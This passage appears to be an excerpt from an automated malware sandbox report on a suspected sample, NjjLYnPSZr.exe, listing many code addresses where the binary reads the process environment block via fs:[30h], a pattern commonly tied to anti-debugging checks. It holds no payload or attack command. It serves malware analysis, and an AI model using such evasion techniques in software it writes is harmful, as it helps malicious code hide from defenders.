          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DA456 mov eax, dword ptr fs:[00000030h]0_2_010DA456
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101645D mov eax, dword ptr fs:[00000030h]0_2_0101645D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104245A mov eax, dword ptr fs:[00000030h]0_2_0104245A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AC460 mov ecx, dword ptr fs:[00000030h]0_2_010AC460
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104A470 mov eax, dword ptr fs:[00000030h]0_2_0104A470
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104A470 mov eax, dword ptr fs:[00000030h]0_2_0104A470
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104A470 mov eax, dword ptr fs:[00000030h]0_2_0104A470
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DA49A mov eax, dword ptr fs:[00000030h]0_2_010DA49A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010264AB mov eax, dword ptr fs:[00000030h]0_2_010264AB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010544B0 mov ecx, dword ptr fs:[00000030h]0_2_010544B0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AA4B0 mov eax, dword ptr fs:[00000030h]0_2_010AA4B0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010204E5 mov ecx, dword ptr fs:[00000030h]0_2_010204E5
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C700 mov eax, dword ptr fs:[00000030h]0_2_0105C700
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01020710 mov eax, dword ptr fs:[00000030h]0_2_01020710
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01050710 mov eax, dword ptr fs:[00000030h]0_2_01050710
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C720 mov eax, dword ptr fs:[00000030h]0_2_0105C720
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C720 mov eax, dword ptr fs:[00000030h]0_2_0105C720
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105273C mov eax, dword ptr fs:[00000030h]0_2_0105273C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105273C mov ecx, dword ptr fs:[00000030h]0_2_0105273C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105273C mov eax, dword ptr fs:[00000030h]0_2_0105273C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109C730 mov eax, dword ptr fs:[00000030h]0_2_0109C730
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105674D mov esi, dword ptr fs:[00000030h]0_2_0105674D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105674D mov eax, dword ptr fs:[00000030h]0_2_0105674D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105674D mov eax, dword ptr fs:[00000030h]0_2_0105674D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01020750 mov eax, dword ptr fs:[00000030h]0_2_01020750
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062750 mov eax, dword ptr fs:[00000030h]0_2_01062750
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062750 mov eax, dword ptr fs:[00000030h]0_2_01062750
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AE75D mov eax, dword ptr fs:[00000030h]0_2_010AE75D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A4755 mov eax, dword ptr fs:[00000030h]0_2_010A4755
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028770 mov eax, dword ptr fs:[00000030h]0_2_01028770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030770 mov eax, dword ptr fs:[00000030h]0_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C678E mov eax, dword ptr fs:[00000030h]0_2_010C678E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010207AF mov eax, dword ptr fs:[00000030h]0_2_010207AF
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D47A0 mov eax, dword ptr fs:[00000030h]0_2_010D47A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102C7C0 mov eax, dword ptr fs:[00000030h]0_2_0102C7C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A07C3 mov eax, dword ptr fs:[00000030h]0_2_010A07C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010427ED mov eax, dword ptr fs:[00000030h]0_2_010427ED
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010427ED mov eax, dword ptr fs:[00000030h]0_2_010427ED
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010427ED mov eax, dword ptr fs:[00000030h]0_2_010427ED
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AE7E1 mov eax, dword ptr fs:[00000030h]0_2_010AE7E1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010247FB mov eax, dword ptr fs:[00000030h]0_2_010247FB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010247FB mov eax, dword ptr fs:[00000030h]0_2_010247FB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E609 mov eax, dword ptr fs:[00000030h]0_2_0109E609
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103260B mov eax, dword ptr fs:[00000030h]0_2_0103260B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103260B mov eax, dword ptr fs:[00000030h]0_2_0103260B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103260B mov eax, dword ptr fs:[00000030h]0_2_0103260B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103260B mov eax, dword ptr fs:[00000030h]0_2_0103260B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103260B mov eax, dword ptr fs:[00000030h]0_2_0103260B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103260B mov eax, dword ptr fs:[00000030h]0_2_0103260B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103260B mov eax, dword ptr fs:[00000030h]0_2_0103260B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01062619 mov eax, dword ptr fs:[00000030h]0_2_01062619
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E627 mov eax, dword ptr fs:[00000030h]0_2_0103E627
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01056620 mov eax, dword ptr fs:[00000030h]0_2_01056620
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01058620 mov eax, dword ptr fs:[00000030h]0_2_01058620
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102262C mov eax, dword ptr fs:[00000030h]0_2_0102262C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103C640 mov eax, dword ptr fs:[00000030h]0_2_0103C640
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E866E mov eax, dword ptr fs:[00000030h]0_2_010E866E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E866E mov eax, dword ptr fs:[00000030h]0_2_010E866E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A660 mov eax, dword ptr fs:[00000030h]0_2_0105A660
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A660 mov eax, dword ptr fs:[00000030h]0_2_0105A660
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01052674 mov eax, dword ptr fs:[00000030h]0_2_01052674
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024690 mov eax, dword ptr fs:[00000030h]0_2_01024690
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024690 mov eax, dword ptr fs:[00000030h]0_2_01024690
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C6A6 mov eax, dword ptr fs:[00000030h]0_2_0105C6A6
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010566B0 mov eax, dword ptr fs:[00000030h]0_2_010566B0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0105A6C7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A6C7 mov eax, dword ptr fs:[00000030h]0_2_0105A6C7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E6F2 mov eax, dword ptr fs:[00000030h]0_2_0109E6F2
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E6F2 mov eax, dword ptr fs:[00000030h]0_2_0109E6F2
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E6F2 mov eax, dword ptr fs:[00000030h]0_2_0109E6F2
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E6F2 mov eax, dword ptr fs:[00000030h]0_2_0109E6F2
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A06F1 mov eax, dword ptr fs:[00000030h]0_2_010A06F1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A06F1 mov eax, dword ptr fs:[00000030h]0_2_010A06F1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E908 mov eax, dword ptr fs:[00000030h]0_2_0109E908
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E908 mov eax, dword ptr fs:[00000030h]0_2_0109E908
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AC912 mov eax, dword ptr fs:[00000030h]0_2_010AC912
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01018918 mov eax, dword ptr fs:[00000030h]0_2_01018918
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01018918 mov eax, dword ptr fs:[00000030h]0_2_01018918
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A892A mov eax, dword ptr fs:[00000030h]0_2_010A892A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B892B mov eax, dword ptr fs:[00000030h]0_2_010B892B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A0946 mov eax, dword ptr fs:[00000030h]0_2_010A0946
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01046962 mov eax, dword ptr fs:[00000030h]0_2_01046962
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01046962 mov eax, dword ptr fs:[00000030h]0_2_01046962
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01046962 mov eax, dword ptr fs:[00000030h]0_2_01046962
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0106096E mov eax, dword ptr fs:[00000030h]0_2_0106096E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0106096E mov edx, dword ptr fs:[00000030h]0_2_0106096E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0106096E mov eax, dword ptr fs:[00000030h]0_2_0106096E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C4978 mov eax, dword ptr fs:[00000030h]0_2_010C4978
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C4978 mov eax, dword ptr fs:[00000030h]0_2_010C4978
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AC97C mov eax, dword ptr fs:[00000030h]0_2_010AC97C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A0 mov eax, dword ptr fs:[00000030h]0_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010209AD mov eax, dword ptr fs:[00000030h]0_2_010209AD
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010209AD mov eax, dword ptr fs:[00000030h]0_2_010209AD
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A89B3 mov esi, dword ptr fs:[00000030h]0_2_010A89B3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A89B3 mov eax, dword ptr fs:[00000030h]0_2_010A89B3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A89B3 mov eax, dword ptr fs:[00000030h]0_2_010A89B3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B69C0 mov eax, dword ptr fs:[00000030h]0_2_010B69C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A9D0 mov eax, dword ptr fs:[00000030h]0_2_0102A9D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A9D0 mov eax, dword ptr fs:[00000030h]0_2_0102A9D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A9D0 mov eax, dword ptr fs:[00000030h]0_2_0102A9D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A9D0 mov eax, dword ptr fs:[00000030h]0_2_0102A9D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A9D0 mov eax, dword ptr fs:[00000030h]0_2_0102A9D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A9D0 mov eax, dword ptr fs:[00000030h]0_2_0102A9D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010549D0 mov eax, dword ptr fs:[00000030h]0_2_010549D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EA9D3 mov eax, dword ptr fs:[00000030h]0_2_010EA9D3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AE9E0 mov eax, dword ptr fs:[00000030h]0_2_010AE9E0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010529F9 mov eax, dword ptr fs:[00000030h]0_2_010529F9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010529F9 mov eax, dword ptr fs:[00000030h]0_2_010529F9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AC810 mov eax, dword ptr fs:[00000030h]0_2_010AC810
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01042835 mov eax, dword ptr fs:[00000030h]0_2_01042835
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01042835 mov eax, dword ptr fs:[00000030h]0_2_01042835
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01042835 mov eax, dword ptr fs:[00000030h]0_2_01042835
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01042835 mov ecx, dword ptr fs:[00000030h]0_2_01042835
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01042835 mov eax, dword ptr fs:[00000030h]0_2_01042835
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01042835 mov eax, dword ptr fs:[00000030h]0_2_01042835
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A830 mov eax, dword ptr fs:[00000030h]0_2_0105A830
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C483A mov eax, dword ptr fs:[00000030h]0_2_010C483A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C483A mov eax, dword ptr fs:[00000030h]0_2_010C483A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01032840 mov ecx, dword ptr fs:[00000030h]0_2_01032840
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01050854 mov eax, dword ptr fs:[00000030h]0_2_01050854
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024859 mov eax, dword ptr fs:[00000030h]0_2_01024859
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024859 mov eax, dword ptr fs:[00000030h]0_2_01024859
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AE872 mov eax, dword ptr fs:[00000030h]0_2_010AE872
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AE872 mov eax, dword ptr fs:[00000030h]0_2_010AE872
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B6870 mov eax, dword ptr fs:[00000030h]0_2_010B6870
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B6870 mov eax, dword ptr fs:[00000030h]0_2_010B6870
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01020887 mov eax, dword ptr fs:[00000030h]0_2_01020887
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AC89D mov eax, dword ptr fs:[00000030h]0_2_010AC89D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E8C0 mov eax, dword ptr fs:[00000030h]0_2_0104E8C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EA8E4 mov eax, dword ptr fs:[00000030h]0_2_010EA8E4
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C8F9 mov eax, dword ptr fs:[00000030h]0_2_0105C8F9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C8F9 mov eax, dword ptr fs:[00000030h]0_2_0105C8F9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109EB1D mov eax, dword ptr fs:[00000030h]0_2_0109EB1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109EB1D mov eax, dword ptr fs:[00000030h]0_2_0109EB1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109EB1D mov eax, dword ptr fs:[00000030h]0_2_0109EB1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109EB1D mov eax, dword ptr fs:[00000030h]0_2_0109EB1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109EB1D mov eax, dword ptr fs:[00000030h]0_2_0109EB1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109EB1D mov eax, dword ptr fs:[00000030h]0_2_0109EB1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109EB1D mov eax, dword ptr fs:[00000030h]0_2_0109EB1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109EB1D mov eax, dword ptr fs:[00000030h]0_2_0109EB1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109EB1D mov eax, dword ptr fs:[00000030h]0_2_0109EB1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104EB20 mov eax, dword ptr fs:[00000030h]0_2_0104EB20
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104EB20 mov eax, dword ptr fs:[00000030h]0_2_0104EB20
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E8B28 mov eax, dword ptr fs:[00000030h]0_2_010E8B28
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E8B28 mov eax, dword ptr fs:[00000030h]0_2_010E8B28
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D4B4B mov eax, dword ptr fs:[00000030h]0_2_010D4B4B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D4B4B mov eax, dword ptr fs:[00000030h]0_2_010D4B4B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B6B40 mov eax, dword ptr fs:[00000030h]0_2_010B6B40
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B6B40 mov eax, dword ptr fs:[00000030h]0_2_010B6B40
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EAB40 mov eax, dword ptr fs:[00000030h]0_2_010EAB40
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C8B42 mov eax, dword ptr fs:[00000030h]0_2_010C8B42
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CEB50 mov eax, dword ptr fs:[00000030h]0_2_010CEB50
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101CB7E mov eax, dword ptr fs:[00000030h]0_2_0101CB7E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030BBE mov eax, dword ptr fs:[00000030h]0_2_01030BBE
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030BBE mov eax, dword ptr fs:[00000030h]0_2_01030BBE
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D4BB0 mov eax, dword ptr fs:[00000030h]0_2_010D4BB0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D4BB0 mov eax, dword ptr fs:[00000030h]0_2_010D4BB0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01040BCB mov eax, dword ptr fs:[00000030h]0_2_01040BCB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01040BCB mov eax, dword ptr fs:[00000030h]0_2_01040BCB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01040BCB mov eax, dword ptr fs:[00000030h]0_2_01040BCB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01020BCD mov eax, dword ptr fs:[00000030h]0_2_01020BCD
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01020BCD mov eax, dword ptr fs:[00000030h]0_2_01020BCD
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01020BCD mov eax, dword ptr fs:[00000030h]0_2_01020BCD
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CEBD0 mov eax, dword ptr fs:[00000030h]0_2_010CEBD0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028BF0 mov eax, dword ptr fs:[00000030h]0_2_01028BF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028BF0 mov eax, dword ptr fs:[00000030h]0_2_01028BF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028BF0 mov eax, dword ptr fs:[00000030h]0_2_01028BF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104EBFC mov eax, dword ptr fs:[00000030h]0_2_0104EBFC
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010ACBF0 mov eax, dword ptr fs:[00000030h]0_2_010ACBF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010ACA11 mov eax, dword ptr fs:[00000030h]0_2_010ACA11
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105CA24 mov eax, dword ptr fs:[00000030h]0_2_0105CA24
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104EA2E mov eax, dword ptr fs:[00000030h]0_2_0104EA2E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01044A35 mov eax, dword ptr fs:[00000030h]0_2_01044A35
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01044A35 mov eax, dword ptr fs:[00000030h]0_2_01044A35
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026A50 mov eax, dword ptr fs:[00000030h]0_2_01026A50
